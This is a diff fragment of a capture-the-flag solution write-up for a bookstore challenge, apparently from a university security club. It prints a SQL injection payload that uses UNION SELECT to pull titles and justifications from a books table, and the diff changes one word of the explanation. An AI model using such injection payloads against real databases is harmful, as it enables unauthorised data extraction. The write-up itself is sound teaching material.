UMD-CSEC/bookstore-public/solution/README.md

 ```
 aaa' UNION SELECT 1,title,justification,4,5,6,7 FROM books; --
 ```
-Instead of selecting the numbers 2 and 3, we select the title and justification columns from the `books` table.
+Now, instead of selecting the numbers 2 and 3, we select the title and justification columns from the `books` table.
 This gives us the following result:

 ![Title and justification for all the books](part3-solved.png)